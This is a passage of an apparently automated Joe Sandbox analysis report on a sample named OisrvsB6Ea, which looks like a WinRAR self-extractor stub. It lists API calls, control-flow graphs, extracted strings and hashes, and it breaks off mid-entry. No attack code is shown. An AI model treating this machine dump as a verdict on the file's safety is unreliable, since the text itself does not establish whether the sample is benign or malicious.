                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0028B93D
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0028B960
                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0028B983
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028B99E
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028B9B1
                                                                                    • Part of subcall function 0028D453: _wcschr.LIBVCRUNTIME ref: 0028D45C
                                                                                    • Part of subcall function 0028D453: _wcslen.LIBCMT ref: 0028D47D
                                                                                  • SetFocus.USER32(00000000), ref: 0028B9B8
                                                                                  • _swprintf.LIBCMT ref: 0028BA24
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 0028D4D4: GetDlgItem.USER32(00000068,002CFCB8), ref: 0028D4E8
                                                                                    • Part of subcall function 0028D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0028AF07,00000001,?,?,0028B7B9,002A506C,002CFCB8,002CFCB8,00001000,00000000,00000000), ref: 0028D510
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028D51B
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028D529
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D53F
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028D559
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D59D
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028D5AB
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D5BA
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D5E1
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002A43F4), ref: 0028D5F0
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0028BA68
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0028BA90
                                                                                  • GetTickCount.KERNEL32 ref: 0028BAAE
                                                                                  • _swprintf.LIBCMT ref: 0028BAC2
                                                                                  • GetLastError.KERNEL32(?,00000011), ref: 0028BAF4
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0028BB43
                                                                                  • _swprintf.LIBCMT ref: 0028BB7C
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0028BBD0
                                                                                  • GetCommandLineW.KERNEL32 ref: 0028BBEA
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0028BC47
                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0028BC6F
                                                                                  • Sleep.KERNEL32(00000064), ref: 0028BCB9
                                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0028BCE2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0028BCEB
                                                                                  • _swprintf.LIBCMT ref: 0028BD1E
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028BD7D
                                                                                  • SetDlgItemTextW.USER32(?,00000065,002A35F4), ref: 0028BD94
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0028BD9D
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028BDAC
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0028BDBB
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028BE68
                                                                                  • _wcslen.LIBCMT ref: 0028BEBE
                                                                                  • _swprintf.LIBCMT ref: 0028BEE8
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028BF32
                                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0028BF4C
                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0028BF55
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0028BF6B
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0028BF85
                                                                                  • SetWindowTextW.USER32(00000000,002BA472), ref: 0028BFA7
                                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0028C007
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028C01A
                                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0028C0BD
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0028C197
                                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0028C1D9
                                                                                    • Part of subcall function 0028C73F: __EH_prolog.LIBCMT ref: 0028C744
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028C1FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<($STARTDLG$^($__tmp_rar_sfx_access_check_%u$h($winrarsfxmappingfile.tmp$Q*
                                                                                  • API String ID: 3829768659-217290775
                                                                                  • Opcode ID: 0d4149731f94df3587dec9153d9ceeb5b6637c673713a04145812671b0bc60f0
                                                                                  • Instruction ID: 4246a07d9e7c600d1d3b293350664a9ec174faf16672d24c4a2dff785f5ed1c2
                                                                                  • Opcode Fuzzy Hash: 0d4149731f94df3587dec9153d9ceeb5b6637c673713a04145812671b0bc60f0
                                                                                  • Instruction Fuzzy Hash: 7142E274D66245BAEB22AB74EC4EFBE377CAB02700F14415AF548A60D2CB745E64CF21
                                                                                  Function 00280863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 269 280863-280886 call 28ec50 GetModuleHandleW 272 280888-28089f GetProcAddress 269->272 273 2808e7-280b48 269->273 274 2808b9-2808c9 GetProcAddress 272->274 275 2808a1-2808b7 272->275 276 280b4e-280b59 call 2975fb 273->276 277 280c14-280c40 GetModuleFileNameW call 27c29a call 280602 273->277 278 2808cb-2808e0 274->278 279 2808e5 274->279 275->274 276->277 287 280b5f-280b8d GetModuleFileNameW CreateFileW 276->287 293 280c42-280c4e call 27b146 277->293 278->279 279->273 288 280c08-280c0f CloseHandle 287->288 289 280b8f-280b9b SetFilePointer 287->289 288->277 289->288 291 280b9d-280bb9 ReadFile 289->291 291->288 295 280bbb-280be0 291->295 298 280c7d-280ca4 call 27c310 GetFileAttributesW 293->298 299 280c50-280c5b call 28081b 293->299 297 280bfd-280c06 call 280371 295->297 297->288 306 280be2-280bfc call 28081b 297->306 309 280cae 298->309 310 280ca6-280caa 298->310 299->298 308 280c5d-280c7b CompareStringW 299->308 306->297 308->298 308->310 313 280cb0-280cb5 309->313 310->293 312 280cac 310->312 312->313 314 280cec-280cee 313->314 315 280cb7 313->315 316 280dfb-280e05 314->316 317 280cf4-280d0b call 27c2e4 call 27b146 314->317 318 280cb9-280ce0 call 27c310 GetFileAttributesW 315->318 328 280d0d-280d6e call 28081b * 2 call 27e617 call 274092 call 27e617 call 28a7e4 317->328 329 280d73-280da6 call 274092 AllocConsole 317->329 323 280cea 318->323 324 280ce2-280ce6 318->324 323->314 324->318 326 280ce8 324->326 326->314 335 280df3-280df5 ExitProcess 328->335 334 280da8-280ded GetCurrentProcessId AttachConsole call 293e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->334 329->335 334->335
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 0028087C
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0028088E
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002808BF
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00280B69
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00280B83
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00280B93
                                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,|<*,00000000), ref: 00280BB1
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00280C09
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00280C1E
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<*,?,00000000,?,00000800), ref: 00280C72
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,|<*,00000800,?,00000000,?,00000800), ref: 00280C9C
                                                                                  • GetFileAttributesW.KERNEL32(?,?,D=*,00000800), ref: 00280CD8
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • _swprintf.LIBCMT ref: 00280D4A
                                                                                  • _swprintf.LIBCMT ref: 00280D96
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • AllocConsole.KERNEL32 ref: 00280D9E
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00280DA8
                                                                                  • AttachConsole.KERNEL32(00000000), ref: 00280DAF
                                                                                  • _wcslen.LIBCMT ref: 00280DC4
                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00280DD5
                                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00280DDC
                                                                                  • Sleep.KERNEL32(00002710), ref: 00280DE7
                                                                                  • FreeConsole.KERNEL32 ref: 00280DED
                                                                                  • ExitProcess.KERNEL32 ref: 00280DF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                  • String ID: (=*$,<*$,@*$0?*$0A*$4B*$8>*$D=*$DXGIDebug.dll$H?*$H@*$HA*$P>*$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=*$`@*$d?*$dA*$dwmapi.dll$h=*$h>*$kernel32$uxtheme.dll$|<*$|?*$|@*$<*$>*$?*$@*$A*
                                                                                  • API String ID: 1207345701-368303933
                                                                                  • Opcode ID: bb3af076aee54010333f4a554c41fc544ae3ebb7d4cdbe52a68d8bdf82fb5725
                                                                                  • Instruction ID: 35fd7cd08a79329662e056676e82740e732ec1025b372985a659872b2c33054a
                                                                                  • Opcode Fuzzy Hash: bb3af076aee54010333f4a554c41fc544ae3ebb7d4cdbe52a68d8bdf82fb5725
                                                                                  • Instruction Fuzzy Hash: EED185B1029385AFD320EF50D889B9FBAE8BF86704F50491DF68996150DFB0866CCF52
                                                                                  Function 0028C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 348 28c73f-28c757 call 28eb78 call 28ec50 353 28d40d-28d418 348->353 354 28c75d-28c787 call 28b314 348->354 354->353 357 28c78d-28c792 354->357 358 28c793-28c7a1 357->358 359 28c7a2-28c7b7 call 28af98 358->359 362 28c7b9 359->362 363 28c7bb-28c7d0 call 281fbb 362->363 366 28c7dd-28c7e0 363->366 367 28c7d2-28c7d6 363->367 369 28d3d9-28d404 call 28b314 366->369 370 28c7e6 366->370 367->363 368 28c7d8 367->368 368->369 369->358 382 28d40a-28d40c 369->382 372 28ca7c-28ca7e 370->372 373 28c7ed-28c7f0 370->373 374 28c9be-28c9c0 370->374 375 28ca5f-28ca61 370->375 372->369 378 28ca84-28ca8b 372->378 373->369 380 28c7f6-28c850 call 28a64d call 27bdf3 call 27a544 call 27a67e call 276edb 373->380 374->369 379 28c9c6-28c9d2 374->379 375->369 377 28ca67-28ca77 SetWindowTextW 375->377 377->369 378->369 383 28ca91-28caaa 378->383 384 28c9d4-28c9e5 call 297686 379->384 385 28c9e6-28c9eb 379->385 437 28c98f-28c9a4 call 27a5d1 380->437 382->353 390 28caac 383->390 391 28cab2-28cac0 call 293e13 383->391 384->385 388 28c9ed-28c9f3 385->388 389 28c9f5-28ca00 call 28b48e 385->389 395 28ca05-28ca07 388->395 389->395 390->391 391->369 402 28cac6-28cacf 391->402 400 28ca09-28ca10 call 293e13 395->400 401 28ca12-28ca32 call 293e13 call 293e3e 395->401 400->401 422 28ca4b-28ca4d 401->422 423 28ca34-28ca3b 401->423 406 28caf8-28cafb 402->406 407 28cad1-28cad5 402->407 411 28cb01-28cb04 406->411 414 28cbe0-28cbee call 280602 406->414 407->411 412 28cad7-28cadf 407->412 419 28cb11-28cb2c 411->419 420 28cb06-28cb0b 411->420 412->369 417 28cae5-28caf3 call 280602 412->417 430 28cbf0-28cc04 call 29279b 414->430 417->430 438 28cb2e-28cb68 419->438 439 28cb76-28cb7d 419->439 420->414 420->419 422->369 429 28ca53-28ca5a call 293e2e 422->429 427 28ca3d-28ca3f 423->427 428 28ca42-28ca4a call 297686 423->428 427->428 428->422 429->369 448 28cc11-28cc62 call 280602 call 28b1be GetDlgItem SetWindowTextW SendMessageW call 293e49 430->448 449 28cc06-28cc0a 430->449 454 28c9aa-28c9b9 call 27a55a 437->454 455 28c855-28c869 SetFileAttributesW 437->455 465 28cb6a 438->465 466 28cb6c-28cb6e 438->466 441 28cbab-28cbce call 293e13 * 2 439->441 442 28cb7f-28cb97 call 293e13 439->442 441->430 474 28cbd0-28cbde call 2805da 441->474 442->441 459 28cb99-28cba6 call 2805da 442->459 481 28cc67-28cc6b 448->481 449->448 453 28cc0c-28cc0e 449->453 453->448 454->369 461 28c90f-28c91f GetFileAttributesW 455->461 462 28c86f-28c8a2 call 27b991 call 27b690 call 293e13 455->462 459->441 461->437 471 28c921-28c930 DeleteFileW 461->471 491 28c8a4-28c8b3 call 293e13 462->491 492 28c8b5-28c8c3 call 27bdb4 462->492 465->466 466->439 471->437 473 28c932-28c935 471->473 478 28c939-28c965 call 274092 GetFileAttributesW 473->478 474->430 489 28c937-28c938 478->489 490 28c967-28c97d MoveFileW 478->490 481->369 486 28cc71-28cc85 SendMessageW 481->486 486->369 489->478 490->437 493 28c97f-28c989 MoveFileExW 490->493 491->492 498 28c8c9-28c908 call 293e13 call 28fff0 491->498 492->454 492->498 493->437 498->461
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028C744
                                                                                    • Part of subcall function 0028B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0028B3FB
                                                                                    • Part of subcall function 0028AF98: _wcschr.LIBVCRUNTIME ref: 0028B033
                                                                                  • _wcslen.LIBCMT ref: 0028CA0A
                                                                                  • _wcslen.LIBCMT ref: 0028CA13
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0028CA71
                                                                                  • _wcslen.LIBCMT ref: 0028CAB3
                                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0028CBFB
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0028CC36
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0028CC46
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,002BA472), ref: 0028CC54
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028CC7F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                  • String ID: %s.%d.tmp$<br>$<($ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$(
                                                                                  • API String ID: 986293930-250077567
                                                                                  • Opcode ID: bef51b914588ffa879819d4fefa7454e077ed6c634b4d390c5fec2899431d2e9
                                                                                  • Instruction ID: 8ff5c5c2c24907b2b332a174dd5701720cfae894b9aaa982e749694d616e44f7
                                                                                  • Opcode Fuzzy Hash: bef51b914588ffa879819d4fefa7454e077ed6c634b4d390c5fec2899431d2e9
                                                                                  • Instruction Fuzzy Hash: 6BE15276911119AADF25EBA0DC85EEE73BCAF05350F5080A6F649E3080EF749F648F60
                                                                                  Function 0027DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0027DA70
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0027DA91
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0027DAAC
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 00281B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027BAE9,00000000,?,?,?,0001047E), ref: 00281BA0
                                                                                  • _wcslen.LIBCMT ref: 0027DDE9
                                                                                  • __fprintf_l.LIBCMT ref: 0027DF1C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9*
                                                                                  • API String ID: 557298264-1730323904
                                                                                  • Opcode ID: 27b6c05cfacc727ab1b3b336529db8df122964d2bb6a66ba5b94f2811b46fbc1
                                                                                  • Instruction ID: e42a819d3bf4bec52c26a8db5e4eae9cef4d222bfe5ff831b0245a4a25149927
                                                                                  • Opcode Fuzzy Hash: 27b6c05cfacc727ab1b3b336529db8df122964d2bb6a66ba5b94f2811b46fbc1
                                                                                  • Instruction Fuzzy Hash: AA32F4719202199BCF25EF64CC42BEE77B4FF09704F41815AF90997281EBB19DA5CB60
                                                                                  Function 0028D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  • GetDlgItem.USER32(00000068,002CFCB8), ref: 0028D4E8
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0028AF07,00000001,?,?,0028B7B9,002A506C,002CFCB8,002CFCB8,00001000,00000000,00000000), ref: 0028D510
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028D51B
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028D529
                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D53F
                                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028D559
                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D59D
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028D5AB
                                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D5BA
                                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D5E1
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A43F4), ref: 0028D5F0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                  • String ID: \
                                                                                  • API String ID: 3569833718-2967466578
                                                                                  • Opcode ID: e4bed2a651202e085ed6b27a36d1cb594b4a7ea496518e6fcd790a5b3afd15fb
                                                                                  • Instruction ID: 28e6ed48b888b9321240e7bd86f4120ee6057d4714b4ac441c0270ec964942f1
                                                                                  • Opcode Fuzzy Hash: e4bed2a651202e085ed6b27a36d1cb594b4a7ea496518e6fcd790a5b3afd15fb
                                                                                  • Instruction Fuzzy Hash: DE319E71546342ABE301EF24EC4EFAB7BACEB86705F00060AF551D61D1DB659A08CB77
                                                                                  Function 0028D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 838 28d78f-28d7a7 call 28ec50 841 28d9e8-28d9f0 838->841 842 28d7ad-28d7b9 call 293e13 838->842 842->841 845 28d7bf-28d7e7 call 28fff0 842->845 848 28d7e9 845->848 849 28d7f1-28d7ff 845->849 848->849 850 28d801-28d804 849->850 851 28d812-28d818 849->851 852 28d808-28d80e 850->852 853 28d85b-28d85e 851->853 855 28d810 852->855 856 28d837-28d844 852->856 853->852 854 28d860-28d866 853->854 859 28d868-28d86b 854->859 860 28d86d-28d86f 854->860 861 28d822-28d82c 855->861 857 28d84a-28d84e 856->857 858 28d9c0-28d9c2 856->858 864 28d854-28d859 857->864 865 28d9c6 857->865 858->865 859->860 866 28d882-28d898 call 27b92d 859->866 860->866 867 28d871-28d878 860->867 862 28d81a-28d820 861->862 863 28d82e 861->863 862->861 870 28d830-28d833 862->870 863->856 864->853 871 28d9cf 865->871 874 28d89a-28d8a7 call 281fbb 866->874 875 28d8b1-28d8bc call 27a231 866->875 867->866 868 28d87a 867->868 868->866 870->856 873 28d9d6-28d9d8 871->873 877 28d9da-28d9dc 873->877 878 28d9e7 873->878 874->875 883 28d8a9 874->883 884 28d8d9-28d8dd 875->884 885 28d8be-28d8d5 call 27b6c4 875->885 877->878 882 28d9de-28d9e1 ShowWindow 877->882 878->841 882->878 883->875 888 28d8e4-28d8e6 884->888 885->884 888->878 889 28d8ec-28d8f9 888->889 890 28d8fb-28d902 889->890 891 28d90c-28d90e 889->891 890->891 892 28d904-28d90a 890->892 893 28d910-28d919 891->893 894 28d925-28d944 call 28dc3b 891->894 892->891 895 28d97b-28d987 CloseHandle 892->895 893->894 900 28d91b-28d923 ShowWindow 893->900 894->895 908 28d946-28d94e 894->908 898 28d998-28d9a6 895->898 899 28d989-28d996 call 281fbb 895->899 898->873 901 28d9a8-28d9aa 898->901 899->871 899->898 900->894 901->873 905 28d9ac-28d9b2 901->905 905->873 907 28d9b4-28d9be 905->907 907->873 908->895 909 28d950-28d961 GetExitCodeProcess 908->909 909->895 910 28d963-28d96d 909->910 911 28d96f 910->911 912 28d974 910->912 911->912 912->895
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0028D7AE
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0028D8DE
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0028D91D
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0028D959
                                                                                  • CloseHandle.KERNEL32(?), ref: 0028D97F
                                                                                  • ShowWindow.USER32(?,00000001), ref: 0028D9E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
